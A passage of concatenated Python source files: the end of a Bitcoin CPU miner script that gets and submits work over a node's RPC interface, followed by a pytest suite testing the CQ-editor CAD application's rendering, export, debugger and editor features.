hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 5554
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_app.py | from path import Path
import os, sys, asyncio
if sys.platform == 'win32':
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
from multiprocessing import Process
import pytest
import pytestqt
import cadquery as cq
from PyQt5.QtCore import Qt, QSettings
from PyQt5.QtWidgets import QFileDialog, QMessageBox
from cq_editor.__main__ import MainWindow
from cq_editor.widgets.editor import Editor
from cq_editor.cq_utils import export, get_occ_color
code = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)'''
code_bigger_object = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(20, 20, 0.5)
result = result.edges("|Z").fillet(0.125)
'''
code_show_Workplane = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
show_object(result)
'''
code_show_Workplane_named = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
log('test')
show_object(result,name='test')
'''
code_show_Shape = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
show_object(result.val())
'''
code_debug_Workplane = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
debug(result)
'''
code_multi = \
'''import cadquery as cq
result1 = cq.Workplane("XY" ).box(3, 3, 0.5)
result2 = cq.Workplane("XY" ).box(3, 3, 0.5).translate((0,15,0))
'''
code_nested_top = """import test_nested_bottom
"""
code_nested_bottom = """a=1
"""
def _modify_file(code, path="test.py"):
with open(path, "w", 1) as f:
f.write(code)
def modify_file(code, path="test.py"):
p = Process(target=_modify_file, args=(code,path))
p.start()
p.join()
def get_center(widget):
pos = widget.pos()
pos.setX(pos.x()+widget.width()//2)
pos.setY(pos.y()+widget.height()//2)
return pos
def get_bottom_left(widget):
pos = widget.pos()
pos.setY(pos.y()+widget.height())
return pos
def get_rgba(ais):
alpha = ais.Transparency()
color = get_occ_color(ais)
return color.redF(),color.redF(),color.redF(),alpha
@pytest.fixture
def main(qtbot,mocker):
mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.Yes)
win = MainWindow()
win.show()
qtbot.addWidget(win)
editor = win.components['editor']
editor.set_text(code)
debugger = win.components['debugger']
debugger._actions['Run'][0].triggered.emit()
return qtbot, win
@pytest.fixture
def main_clean(qtbot,mocker):
mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.Yes)
win = MainWindow()
win.show()
qtbot.addWidget(win)
qtbot.waitForWindowShown(win)
editor = win.components['editor']
editor.set_text(code)
return qtbot, win
@pytest.fixture
def main_clean_do_not_close(qtbot,mocker):
mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.No)
win = MainWindow()
win.show()
qtbot.addWidget(win)
qtbot.waitForWindowShown(win)
editor = win.components['editor']
editor.set_text(code)
return qtbot, win
@pytest.fixture
def main_multi(qtbot,mocker):
mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.Yes)
mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.step',''))
win = MainWindow()
win.show()
qtbot.addWidget(win)
qtbot.waitForWindowShown(win)
editor = win.components['editor']
editor.set_text(code_multi)
debugger = win.components['debugger']
debugger._actions['Run'][0].triggered.emit()
return qtbot, win
def test_render(main):
qtbot, win = main
obj_tree_comp = win.components['object_tree']
editor = win.components['editor']
debugger = win.components['debugger']
console = win.components['console']
log = win.components['log']
# enable CQ reloading
debugger.preferences['Reload CQ'] = True
# check that object was rendered
assert(obj_tree_comp.CQ.childCount() == 1)
# check that object was removed
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# check that object was rendered usin explicit show_object call
editor.set_text(code_show_Workplane)
debugger._actions['Run'][0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 1)
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# check that cq.Shape object was rendered using explicit show_object call
editor.set_text(code_show_Shape)
debugger._actions['Run'][0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 1)
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# test rendering via console
console.execute(code_show_Workplane)
assert(obj_tree_comp.CQ.childCount() == 1)
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
console.execute(code_show_Shape)
assert(obj_tree_comp.CQ.childCount() == 1)
# check object rendering using show_object call with a name specified and
# debug call
editor.set_text(code_show_Workplane_named)
debugger._actions['Run'][0].triggered.emit()
qtbot.wait(100)
assert(obj_tree_comp.CQ.child(0).text(0) == 'test')
assert('test' in log.toPlainText().splitlines()[-1])
def test_export(main,mocker):
qtbot, win = main
debugger = win.components['debugger']
debugger._actions['Run'][0].triggered.emit()
#set focus
obj_tree = win.components['object_tree'].tree
obj_tree_comp = win.components['object_tree']
qtbot.mouseClick(obj_tree, Qt.LeftButton)
qtbot.keyClick(obj_tree, Qt.Key_Down)
qtbot.keyClick(obj_tree, Qt.Key_Down)
#export STL
mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.stl',''))
obj_tree_comp._export_STL_action.triggered.emit()
assert(os.path.isfile('out.stl'))
#export STEP
mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.step',''))
obj_tree_comp._export_STEP_action.triggered.emit()
assert(os.path.isfile('out.step'))
#clean
os.remove('out.step')
os.remove('out.stl')
def number_visible_items(viewer):
from OCP.AIS import AIS_ListOfInteractive
l = AIS_ListOfInteractive()
viewer_ctx = viewer._get_context()
viewer_ctx.DisplayedObjects(l)
return l.Extent()
def test_inspect(main):
qtbot, win = main
#set focus and make invisible
obj_tree = win.components['object_tree'].tree
qtbot.mouseClick(obj_tree, Qt.LeftButton)
qtbot.keyClick(obj_tree, Qt.Key_Down)
qtbot.keyClick(obj_tree, Qt.Key_Down)
qtbot.keyClick(obj_tree, Qt.Key_Space)
#enable object inspector
insp = win.components['cq_object_inspector']
insp._toolbar_actions[0].toggled.emit(True)
#check if all stack items are visible in the tree
assert(insp.root.childCount() == 3)
#check if correct number of items is displayed
viewer = win.components['viewer']
insp.setCurrentItem(insp.root.child(0))
assert(number_visible_items(viewer) == 4)
insp.setCurrentItem(insp.root.child(1))
assert(number_visible_items(viewer) == 7)
insp.setCurrentItem(insp.root.child(2))
assert(number_visible_items(viewer) == 4)
insp._toolbar_actions[0].toggled.emit(False)
assert(number_visible_items(viewer) == 3)
class event_loop(object):
'''Used to mock the QEventLoop for the debugger component
'''
def __init__(self,callbacks):
self.callbacks = callbacks
self.i = 0
def exec_(self):
if self.i<len(self.callbacks):
self.callbacks[self.i]()
self.i+=1
def exit(self,*args):
pass
def patch_debugger(debugger,event_loop_mock):
debugger.inner_event_loop.exec_ = event_loop_mock.exec_
debugger.inner_event_loop.exit = event_loop_mock.exit
def test_debug(main,mocker):
# store the tracing function
trace_function = sys.gettrace()
def assert_func(x):
'''Neddedd to perform asserts in lambdas
'''
assert(x)
qtbot, win = main
#clear all
obj_tree = win.components['object_tree']
obj_tree.toolbarActions()[0].triggered.emit()
editor = win.components['editor']
editor.set_text(code)
debugger = win.components['debugger']
actions = debugger._actions['Run']
run,debug,step,step_in,cont = actions
variables = win.components['variables_viewer']
viewer = win.components['viewer']
assert(number_visible_items(viewer) == 3)
#check breakpoints
assert(debugger.breakpoints == [])
#check _frames
assert(debugger._frames == [])
#test step through
ev = event_loop([lambda: (assert_func(variables.model().rowCount() == 4),
assert_func(number_visible_items(viewer) == 3),
step.triggered.emit()),
lambda: (assert_func(variables.model().rowCount() == 4),
assert_func(number_visible_items(viewer) == 3),
step.triggered.emit()),
lambda: (assert_func(variables.model().rowCount() == 5),
assert_func(number_visible_items(viewer) == 3),
step.triggered.emit()),
lambda: (assert_func(variables.model().rowCount() == 5),
assert_func(number_visible_items(viewer) == 4),
cont.triggered.emit())])
patch_debugger(debugger,ev)
debug.triggered.emit(True)
assert(variables.model().rowCount() == 2)
assert(number_visible_items(viewer) == 4)
#test exit debug
ev = event_loop([lambda: (step.triggered.emit(),),
lambda: (assert_func(variables.model().rowCount() == 1),
assert_func(number_visible_items(viewer) == 3),
debug.triggered.emit(False),)])
patch_debugger(debugger,ev)
debug.triggered.emit(True)
assert(variables.model().rowCount() == 1)
assert(number_visible_items(viewer) == 3)
#test breakpoint
ev = event_loop([lambda: (cont.triggered.emit(),),
lambda: (assert_func(variables.model().rowCount() == 5),
assert_func(number_visible_items(viewer) == 4),
cont.triggered.emit(),)])
patch_debugger(debugger,ev)
editor.debugger.set_breakpoints([(4,None)])
debug.triggered.emit(True)
assert(variables.model().rowCount() == 2)
assert(number_visible_items(viewer) == 4)
#test breakpoint without using singals
ev = event_loop([lambda: (cont.triggered.emit(),),
lambda: (assert_func(variables.model().rowCount() == 5),
assert_func(number_visible_items(viewer) == 4),
cont.triggered.emit(),)])
patch_debugger(debugger,ev)
editor.debugger.set_breakpoints([(4,None)])
debugger.debug(True)
assert(variables.model().rowCount() == 2)
assert(number_visible_items(viewer) == 4)
#test debug() without using singals
ev = event_loop([lambda: (cont.triggered.emit(),),
lambda: (assert_func(variables.model().rowCount() == 5),
assert_func(number_visible_items(viewer) == 4),
cont.triggered.emit(),)])
patch_debugger(debugger,ev)
editor.set_text(code_debug_Workplane)
editor.debugger.set_breakpoints([(4,None)])
debugger.debug(True)
CQ = obj_tree.CQ
# object 1 (defualt color)
r,g,b,a = get_rgba(CQ.child(0).ais)
assert( a == pytest.approx(0.2) )
assert( r == 1.0 )
assert(variables.model().rowCount() == 2)
assert(number_visible_items(viewer) == 4)
# restore the tracing function
sys.settrace(trace_function)
code_err1 = \
'''import cadquery as cq
(
result = cq.Workplane("XY" ).box(3, 3, 0.5).edges("|Z").fillet(0.125)
'''
code_err2 = \
'''import cadquery as cq
result = cq.Workplane("XY" ).box(3, 3, 0.5).edges("|Z").fillet(0.125)
f()
'''
def test_traceback(main):
# store the tracing function
trace_function = sys.gettrace()
qtbot, win = main
editor = win.components['editor']
debugger = win.components['debugger']
traceback_view = win.components['traceback_viewer']
actions = debugger._actions['Run']
run,debug,step,step_in,cont = actions
editor.set_text(code_err1)
run.triggered.emit()
assert('SyntaxError' in traceback_view.current_exception.text())
debug.triggered.emit()
assert('SyntaxError' in traceback_view.current_exception.text())
assert(debug.isChecked() == False)
editor.set_text(code_err2)
run.triggered.emit()
assert('NameError' in traceback_view.current_exception.text())
assert(hasattr(sys, 'last_traceback'))
del sys.last_traceback
assert(not hasattr(sys, 'last_traceback'))
#test last_traceback with debug
ev = event_loop([lambda: (cont.triggered.emit(),)])
patch_debugger(debugger,ev)
debugger.debug(True)
assert('NameError' in traceback_view.current_exception.text())
assert(hasattr(sys, 'last_traceback'))
# restore the tracing function
sys.settrace(trace_function)
@pytest.fixture
def editor(qtbot):
win = Editor()
win.show()
qtbot.addWidget(win)
return qtbot, win
def conv_line_ends(text):
return '\n'.join(text.splitlines())
def test_editor(monkeypatch,editor):
qtbot, editor = editor
with open('test.py','w') as f:
f.write(code)
#check that no text is present
assert(editor.get_text_with_eol() == '')
#check that loading from file works properly
editor.load_from_file('test.py')
assert(len(editor.get_text_with_eol()) > 0)
assert(conv_line_ends(editor.get_text_with_eol()) == code)
#check that loading from file works properly
editor.new()
assert(editor.get_text_with_eol() == '')
#monkeypatch QFileDialog methods
def filename(*args, **kwargs):
return 'test.py',None
def filename2(*args, **kwargs):
return 'test2.py',None
monkeypatch.setattr(QFileDialog, 'getOpenFileName',
staticmethod(filename))
monkeypatch.setattr(QFileDialog, 'getSaveFileName',
staticmethod(filename2))
#check that open file works properly
editor.open()
assert(conv_line_ends(editor.get_text_with_eol()) == code)
#check that save file works properly
editor.new()
qtbot.mouseClick(editor, Qt.LeftButton)
qtbot.keyClick(editor,Qt.Key_A)
assert(editor.document().isModified() == True)
editor.filename = 'test2.py'
editor.save()
assert(editor.document().isModified() == False)
monkeypatch.setattr(QFileDialog, 'getOpenFileName',
staticmethod(filename2))
editor.open()
assert(editor.get_text_with_eol() == 'a')
#check that save as works properly
os.remove('test2.py')
editor.save_as()
assert(os.path.exists(filename2()[0]))
#test persistance
settings = QSettings('test')
editor.saveComponentState(settings)
editor.new()
assert(editor.get_text_with_eol() == '')
editor.restoreComponentState(settings)
assert(editor.get_text_with_eol() == 'a')
#test error handling
os.remove('test2.py')
assert(not os.path.exists('test2.py'))
editor.restoreComponentState(settings)
@pytest.mark.repeat(1)
def test_editor_autoreload(monkeypatch,editor):
qtbot, editor = editor
TIMEOUT = 500
# start out with autoreload enabled
editor.autoreload(True)
with open('test.py','w') as f:
f.write(code)
assert(editor.get_text_with_eol() == '')
editor.load_from_file('test.py')
assert(len(editor.get_text_with_eol()) > 0)
# wait for reload.
with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
# modify file - NB: separate process is needed to avoid Widows quirks
modify_file(code_bigger_object)
# check that editor has updated file contents
assert(code_bigger_object.splitlines()[2] in editor.get_text_with_eol())
# disable autoreload
editor.autoreload(False)
# Wait for reload in case it incorrectly happens. A timeout should occur
# instead because a re-render should not be triggered with autoreload
# disabled.
with pytest.raises(pytestqt.exceptions.TimeoutError):
with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
# re-write original file contents
modify_file(code)
# editor should continue showing old contents since autoreload is disabled.
assert(code_bigger_object.splitlines()[2] in editor.get_text_with_eol())
# Saving a file with autoreload disabled should not trigger a rerender.
with pytest.raises(pytestqt.exceptions.TimeoutError):
with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
editor.save()
editor.autoreload(True)
# Saving a file with autoreload enabled should trigger a rerender.
with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
editor.save()
def test_autoreload_nested(editor):
qtbot, editor = editor
TIMEOUT = 500
editor.autoreload(True)
editor.preferences['Autoreload: watch imported modules'] = True
with open('test_nested_top.py','w') as f:
f.write(code_nested_top)
with open('test_nested_bottom.py','w') as f:
f.write("")
assert(editor.get_text_with_eol() == '')
editor.load_from_file('test_nested_top.py')
assert(len(editor.get_text_with_eol()) > 0)
# wait for reload.
with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
# modify file - NB: separate process is needed to avoid Windows quirks
modify_file(code_nested_bottom, 'test_nested_bottom.py')
def test_console(main):
qtbot, win = main
console = win.components['console']
# test execute_command
a = []
console.push_vars({'a' : a})
console.execute_command('a.append(1)')
assert(len(a) == 1)
# test print_text
pos_orig = console._prompt_pos
console.print_text('a')
assert(console._prompt_pos == pos_orig + len('a'))
def test_viewer(main):
qtbot, win = main
viewer = win.components['viewer']
#not sure how to test this, so only smoke tests
#trigger all 'View' actions
actions = viewer._actions['View']
for a in actions: a.trigger()
code_module = \
'''def dummy(): return True'''
code_import = \
'''from module import dummy
assert(dummy())'''
def test_module_import(main):
qtbot, win = main
editor = win.components['editor']
debugger = win.components['debugger']
traceback_view = win.components['traceback_viewer']
#save the dummy module
with open('module.py','w') as f:
f.write(code_module)
#run the code importing this module
editor.set_text(code_import)
debugger._actions['Run'][0].triggered.emit()
#verify that no exception was generated
assert(traceback_view.current_exception.text() == '')
def test_auto_fit_view(main_clean):
def concat(eye,proj,scale):
return eye+proj+(scale,)
def approx_view_properties(eye,proj,scale):
return pytest.approx(eye+proj+(scale,))
qtbot, win = main_clean
editor = win.components['editor']
debugger = win.components['debugger']
viewer = win.components['viewer']
object_tree = win.components['object_tree']
view = viewer.canvas.view
viewer.preferences['Fit automatically'] = False
eye0,proj0,scale0 = view.Eye(),view.Proj(),view.Scale()
# check if camera position is adjusted automatically when rendering for the
# first time
debugger.render()
eye1,proj1,scale1 = view.Eye(),view.Proj(),view.Scale()
assert( concat(eye0,proj0,scale0) != \
approx_view_properties(eye1,proj1,scale1) )
# check if camera position is not changed fter code change
editor.set_text(code_bigger_object)
debugger.render()
eye2,proj2,scale2 = view.Eye(),view.Proj(),view.Scale()
assert( concat(eye1,proj1,scale1) == \
approx_view_properties(eye2,proj2,scale2) )
# check if position is adjusted automatically after erasing all objects
object_tree.removeObjects()
debugger.render()
eye3,proj3,scale3 = view.Eye(),view.Proj(),view.Scale()
assert( concat(eye2,proj2,scale2) != \
approx_view_properties(eye3,proj3,scale3) )
# check if position is adjusted automatically if settings are changed
viewer.preferences['Fit automatically'] = True
editor.set_text(code)
debugger.render()
eye4,proj4,scale4 = view.Eye(),view.Proj(),view.Scale()
assert( concat(eye3,proj3,scale3) != \
approx_view_properties(eye4,proj4,scale4) )
def test_preserve_properties(main):
qtbot, win = main
debugger = win.components['debugger']
debugger._actions['Run'][0].triggered.emit()
object_tree = win.components['object_tree']
object_tree.preferences['Preserve properties on reload'] = True
assert(object_tree.CQ.childCount() == 1)
props = object_tree.CQ.child(0).properties
props['Visible'] = False
props['Color'] = '#caffee'
props['Alpha'] = 0.5
debugger._actions['Run'][0].triggered.emit()
assert(object_tree.CQ.childCount() == 1)
props = object_tree.CQ.child(0).properties
assert(props['Visible'] == False)
assert(props['Color'].name() == '#caffee')
assert(props['Alpha'] == 0.5)
def test_selection(main_multi,mocker):
qtbot, win = main_multi
viewer = win.components['viewer']
object_tree = win.components['object_tree']
CQ = object_tree.CQ
obj1 = CQ.child(0)
obj2 = CQ.child(1)
# export with two selected objects
obj1.setSelected(True)
obj2.setSelected(True)
object_tree._export_STEP_action.triggered.emit()
imported = cq.importers.importStep('out.step')
assert(len(imported.solids().vals()) == 2)
# export with one selected objects
obj2.setSelected(False)
object_tree._export_STEP_action.triggered.emit()
imported = cq.importers.importStep('out.step')
assert(len(imported.solids().vals()) == 1)
# export with one selected objects
obj1.setSelected(False)
CQ.setSelected(True)
object_tree._export_STEP_action.triggered.emit()
imported = cq.importers.importStep('out.step')
assert(len(imported.solids().vals()) == 2)
# check if viewer and object tree are properly connected
CQ.setSelected(False)
obj1.setSelected(True)
obj2.setSelected(True)
ctx = viewer._get_context()
ctx.InitSelected()
shapes = []
while ctx.MoreSelected():
shapes.append(ctx.SelectedShape())
ctx.NextSelected()
assert(len(shapes) == 2)
viewer.fit()
qtbot.mouseClick(viewer.canvas, Qt.LeftButton)
assert(len(object_tree.tree.selectedItems()) == 0)
viewer.sigObjectSelected.emit([obj1.shape_display.wrapped])
assert(len(object_tree.tree.selectedItems()) == 1)
# go through different handleSelection paths
qtbot.mouseClick(object_tree.tree, Qt.LeftButton)
qtbot.keyClick(object_tree.tree, Qt.Key_Down)
qtbot.keyClick(object_tree.tree, Qt.Key_Down)
qtbot.keyClick(object_tree.tree, Qt.Key_Down)
qtbot.keyClick(object_tree.tree, Qt.Key_Down)
assert(object_tree._export_STL_action.isEnabled() == False)
assert(object_tree._export_STEP_action.isEnabled() == False)
assert(object_tree._clear_current_action.isEnabled() == False)
assert(object_tree.properties_editor.isEnabled() == False)
def test_closing(main_clean_do_not_close):
qtbot,win = main_clean_do_not_close
editor = win.components['editor']
# make sure that windows is visible
assert(win.isVisible())
# should not quit
win.close()
assert(win.isVisible())
# should quit
editor.reset_modified()
win.close()
assert(not win.isVisible())
def test_check_for_updates(main,mocker):
qtbot,win = main
# patch requests
import requests
mocker.patch.object(requests.models.Response,'json',
return_value=[{'tag_name' : '0.0.2','draft' : False}])
# stub QMessageBox about
about_stub = mocker.stub()
mocker.patch.object(QMessageBox, 'about', about_stub)
import cadquery
cadquery.__version__ = '0.0.1'
win.check_for_cq_updates()
assert(about_stub.call_args[0][1] == 'Updates available')
cadquery.__version__ = '0.0.3'
win.check_for_cq_updates()
assert(about_stub.call_args[0][1] == 'No updates available')
@pytest.mark.skipif(sys.platform.startswith('linux'),reason='Segfault workaround for linux')
def test_screenshot(main,mocker):
qtbot,win = main
mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.png',''))
viewer = win.components['viewer']
viewer._actions['Tools'][0].triggered.emit()
assert(os.path.exists('out.png'))
def test_resize(main):
qtbot,win = main
editor = win.components['editor']
editor.hide()
qtbot.wait(50)
editor.show()
qtbot.wait(50)
code_simple_step = \
'''import cadquery as cq
imported = cq.importers.importStep('shape.step')
'''
def test_relative_references(main):
# create code with a relative reference in a subdirectory
p = Path('test_relative_references')
p.mkdir_p()
p_code = p.joinpath('code.py')
p_code.write_text(code_simple_step)
# create the referenced step file
shape = cq.Workplane("XY").box(1, 1, 1)
p_step = p.joinpath('shape.step')
export(shape, "step", p_step)
# open code
qtbot, win = main
editor = win.components['editor']
editor.load_from_file(p_code)
# render
debugger = win.components['debugger']
debugger._actions['Run'][0].triggered.emit()
# assert no errors
traceback_view = win.components['traceback_viewer']
assert(traceback_view.current_exception.text() == '')
# assert one object has been rendered
obj_tree_comp = win.components['object_tree']
assert(obj_tree_comp.CQ.childCount() == 1)
# clean up
p_code.remove_p()
p_step.remove_p()
p.rmdir_p()
code_color = \
'''
import cadquery as cq
result = cq.Workplane("XY" ).box(1, 1, 1)
show_object(result, name ='1')
show_object(result, name ='2', options=dict(alpha=0.5,color='red'))
show_object(result, name ='3', options=dict(alpha=0.5,color='#ff0000'))
show_object(result, name ='4', options=dict(alpha=0.5,color=(255,0,0)))
show_object(result, name ='5', options=dict(alpha=0.5,color=(1.,0,0)))
show_object(result, name ='6', options=dict(rgba=(1.,0,0,.5)))
show_object(result, name ='7', options=dict(color=('ff','cc','dd')))
'''
def test_render_colors(main_clean):
qtbot, win = main_clean
obj_tree = win.components['object_tree']
editor = win.components['editor']
debugger = win.components['debugger']
log = win.components['log']
editor.set_text(code_color)
debugger._actions['Run'][0].triggered.emit()
CQ = obj_tree.CQ
# object 1 (defualt color)
r,g,b,a = get_rgba(CQ.child(0).ais)
assert( a == 0 )
assert( r != 1.0 )
# object 2
r,g,b,a = get_rgba(CQ.child(1).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# object 3
r,g,b,a = get_rgba(CQ.child(2).ais)
assert( a == 0.5)
assert( r == 1.0 )
# object 4
r,g,b,a = get_rgba(CQ.child(3).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# object 5
r,g,b,a = get_rgba(CQ.child(4).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# object 6
r,g,b,a = get_rgba(CQ.child(5).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# check if error occured
qtbot.wait(100)
assert('Unknown color format' in log.toPlainText().splitlines()[-1])
def test_render_colors_console(main_clean):
qtbot, win = main_clean
obj_tree = win.components['object_tree']
log = win.components['log']
console = win.components['console']
console.execute_command(code_color)
def get_rgba(ais):
alpha = ais.Transparency()
color = get_occ_color(ais)
return color.redF(),color.redF(),color.redF(),alpha
CQ = obj_tree.CQ
# object 1 (defualt color)
r,g,b,a = get_rgba(CQ.child(0).ais)
assert( a == 0 )
assert( r != 1.0 )
# object 2
r,g,b,a = get_rgba(CQ.child(1).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# object 3
r,g,b,a = get_rgba(CQ.child(2).ais)
assert( a == 0.5)
assert( r == 1.0 )
# object 4
r,g,b,a = get_rgba(CQ.child(3).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# object 5
r,g,b,a = get_rgba(CQ.child(4).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# object 6
r,g,b,a = get_rgba(CQ.child(5).ais)
assert( a == 0.5 )
assert( r == 1.0 )
# check if error occured
qtbot.wait(100)
assert('Unknown color format' in log.toPlainText().splitlines()[-1])
def test_confirm_new(monkeypatch,editor):
qtbot, editor = editor
#check that initial state is as expected
assert(editor.modified == False)
editor.document().setPlainText(code)
assert(editor.modified == True)
#monkeypatch the confirmation dialog and run both scenarios
def cancel(*args, **kwargs):
return QMessageBox.No
def ok(*args, **kwargs):
return QMessageBox.Yes
monkeypatch.setattr(QMessageBox, 'question',
staticmethod(cancel))
editor.new()
assert(editor.modified == True)
assert(conv_line_ends(editor.get_text_with_eol()) == code)
monkeypatch.setattr(QMessageBox, 'question',
staticmethod(ok))
editor.new()
assert(editor.modified == False)
assert(editor.get_text_with_eol() == '')
code_show_topods = \
'''
import cadquery as cq
result = cq.Workplane("XY" ).box(1, 1, 1)
show_object(result.val().wrapped)
'''
def test_render_topods(main):
qtbot, win = main
obj_tree_comp = win.components['object_tree']
editor = win.components['editor']
debugger = win.components['debugger']
console = win.components['console']
# check that object was rendered
assert(obj_tree_comp.CQ.childCount() == 1)
# check that object was removed
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# check that object was rendered usin explicit show_object call
editor.set_text(code_show_topods)
debugger._actions['Run'][0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 1)
# test rendering of topods object via console
console.execute('show(result.val().wrapped)')
assert(obj_tree_comp.CQ.childCount() == 2)
# test rendering of list of topods object via console
console.execute('show([result.val().wrapped,result.val().wrapped])')
assert(obj_tree_comp.CQ.childCount() == 3)
code_show_shape_list = \
'''
import cadquery as cq
result1 = cq.Workplane("XY" ).box(1, 1, 1).val()
result2 = cq.Workplane("XY",origin=(0,1,1)).box(1, 1, 1).val()
show_object(result1)
show_object([result1,result2])
'''
def test_render_shape_list(main):
qtbot, win = main
log = win.components['log']
obj_tree_comp = win.components['object_tree']
editor = win.components['editor']
debugger = win.components['debugger']
console = win.components['console']
# check that object was removed
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# check that object was rendered usin explicit show_object call
editor.set_text(code_show_shape_list)
debugger._actions['Run'][0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 2)
# test rendering of Shape via console
console.execute('show(result1)')
console.execute('show([result1,result2])')
assert(obj_tree_comp.CQ.childCount() == 4)
# smoke test exception in show
console.execute('show("a")')
code_show_assy = \
'''import cadquery as cq
result1 = cq.Workplane("XY" ).box(3, 3, 0.5)
assy = cq.Assembly(result1)
show_object(assy)
'''
def test_render_assy(main):
qtbot, win = main
obj_tree_comp = win.components['object_tree']
editor = win.components['editor']
debugger = win.components['debugger']
console = win.components['console']
# check that object was removed
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# check that object was rendered usin explicit show_object call
editor.set_text(code_show_assy)
debugger._actions['Run'][0].triggered.emit()
qtbot.wait(500)
assert(obj_tree_comp.CQ.childCount() == 1)
# test rendering via console
console.execute('show(assy)')
qtbot.wait(500)
assert(obj_tree_comp.CQ.childCount() == 2)
code_show_ais = \
'''import cadquery as cq
from cadquery.occ_impl.assembly import toCAF
import OCP
